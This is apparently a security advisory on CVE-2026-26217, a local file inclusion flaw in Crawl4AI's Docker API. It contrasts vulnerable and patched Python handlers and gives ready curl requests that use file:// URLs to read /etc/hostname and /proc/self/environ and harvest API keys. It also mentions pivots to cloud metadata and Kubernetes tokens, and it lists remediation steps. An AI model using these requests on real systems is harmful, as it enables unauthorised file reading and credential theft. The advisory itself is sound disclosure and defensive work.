Feb 17, 2026·6 min read·12 visits
Crawl4AI exposed a headless browser via API without validating URL schemas. Attackers can use `file:///etc/passwd` or `file:///proc/self/environ` to read server files and steal API keys. Fixed in version 0.8.0.
A critical Local File Inclusion (LFI) vulnerability in Crawl4AI's Docker API allows unauthenticated attackers to abuse the `file://` protocol. By leveraging the headless browser intended for web scraping, attackers can read arbitrary files from the host filesystem, including sensitive environment variables and credentials.
In the gold rush of 2025, everyone needed data to feed their hungry Large Language Models. Enter Crawl4AI, a nifty tool designed to turn the chaotic web into clean, LLM-ready JSON. It’s a developer favorite because it abstracts away the nightmare of managing headless browsers like Chromium. You spin up a Docker container, send it a URL, and it politely hands back the content. Simple, right?
But here is the problem with abstraction: it hides the monsters. When you deploy Crawl4AI's Docker API, you are essentially exposing a full-featured web browser to the internet. Browsers are designed to be helpful. They want to render images, execute JavaScript, and—if you ask nicely—open local files.
CVE-2026-26217 is what happens when you hand a loaded browser to the public internet without checking the safety. It turns out, if you asked Crawl4AI to "crawl" your own hard drive using the file:// protocol, it wouldn't just comply; it would take a screenshot, convert it to PDF, or extract the text and serve it up on a silver platter. It’s not just a bug; it’s an architectural oversight that turns a scraping tool into a file exfiltration cannon.
The vulnerability lies in a classic failure of input validation, specifically regarding Uniform Resource Identifier (URI) schemes. The Crawl4AI API endpoints—/execute_js, /screenshot, /pdf, and /html—accept a JSON payload containing a url parameter. The application logic takes this string and passes it directly to the underlying browser automation library (likely Playwright or Puppeteer).
Under normal circumstances, a browser should be able to open local files. If you double-click an HTML file on your desktop, Chrome opens it. That's a feature. However, in a server-side context, this feature becomes a critical vulnerability known as Local File Inclusion (LFI) or Server-Side Request Forgery (SSRF) with local access.
> [!NOTE]
> The Protocol Problem
> The root cause isn't that the code was complex; it's that it was too simple. It lacked an allowlist. It implicitly trusted that the user would only provide http:// or https:// URLs.
By supplying a URI like file:///etc/passwd, the attacker instructs the headless browser to navigate to the local file system. Because the browser process (running inside the container) has read permissions for standard system files, it renders the file content just as it would render a webpage. The API then packages this content into the response, completing the exfiltration loop.
Let's look at a reconstruction of the vulnerable logic versus the patched approach. The vulnerability exists because the URL is passed raw to the browser navigation method.
In the vulnerable versions (< 0.8.0), the handler for the /html endpoint looked something like this:
@app.post("/html")
async def get_html(request: CrawlRequest):
# ❌ FATAL ERROR: No validation of request.url
# The browser blindly follows the file:// protocol
await page.goto(request.url)
content = await page.content()
return {"html": content}The patch introduces a strict protocol check. Before the URL touches the browser, it must pass a schema validation check.
from urllib.parse import urlparse
@app.post("/html")
async def get_html(request: CrawlRequest):
parsed = urlparse(request.url)
# ✅ SECURITY FIX: Enforce HTTP/HTTPS
if parsed.scheme not in ["http", "https"]:
raise HTTPException(status_code=400, detail="Invalid protocol")
await page.goto(request.url)
content = await page.content()
return {"html": content}This simple check neutralizes the attack. If an attacker tries to pass file:///etc/shadow, the urlparse logic sees the scheme as file, the check fails, and the request is rejected before the browser is even invoked.
Exploiting this vulnerability is trivial and requires no authentication in the default Docker configuration. We can use standard curl commands to extract data. The most dangerous vector here isn't necessarily /etc/passwd—it's the environment variables.
Since this tool is built for AI workflows, it is highly likely that the container environment contains API keys for OpenAI, Anthropic, or AWS credentials.
We check if the server is vulnerable by trying to read the /etc/hostname file, which is present in almost every Docker container.
curl -X POST http://target:8080/html \
-H "Content-Type: application/json" \
-d '{"url": "file:///etc/hostname"}'If the server responds with the hostname, we escalate immediately to /proc/self/environ. This file contains the environment variables for the current process, separated by null bytes.
curl -X POST http://target:8080/execute_js \
-H "Content-Type: application/json" \
-d '{
"url": "file:///proc/self/environ",
"scripts": ["document.body.innerText"]
}'The Output:
Instead of a webpage, the attacker receives a JSON response containing strings like:
OPENAI_API_KEY=sk-proj-12345...\u0000AWS_ACCESS_KEY_ID=AKIA...
With these keys, the attacker can pivot from the simple scraper container to the victim's cloud infrastructure or drain their AI credits.
While CVSS 9.2 sounds high (and it is), the real impact depends on context. If Crawl4AI is running on a developer's laptop, the attacker reads their local files. If it's running in a Kubernetes cluster, the attacker reads the Service Account token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.
http://localhost:80 or http://169.254.169.254 (cloud metadata services) to steal IAM roles.This is a "game over" vulnerability for the confidentiality of the container and potentially the hosting infrastructure.
The remediation is straightforward, but urgency is required. The exploit is public, simple, and scriptable.
1. Update Immediately:
Pull the latest Docker image. Version 0.8.0 and above contain the fix.
docker pull unclecode/crawl4ai:latest2. Network Segmentation: Even with the patch, a scraping tool should never have unfettered access to internal networks. Ensure the container typically has no egress access to internal subnets (10.0.0.0/8, 192.168.0.0/16) and block access to cloud metadata IPs (169.254.169.254).
3. Run with Least Privilege:
Do not run the container as root. While this doesn't stop the LFI of world-readable files, it prevents access to /etc/shadow or other root-owned sensitive data.
4. Authentication: The default Crawl4AI Docker setup does not enforce authentication. Put it behind a reverse proxy (Nginx, Traefik) that enforces Basic Auth or API key validation. Do not expose port 8080 to the public internet.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N| Product | Affected Versions | Fixed Version |
|---|---|---|
Crawl4AI unclecode | < 0.8.0 | 0.8.0 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-22 (Path Traversal) |
| CVSS v4.0 | 9.2 (Critical) |
| CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N |
| Attack Vector | Network (API) |
| Exploit Status | PoC Available / Active |
| Impact | Information Disclosure (High) |
The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.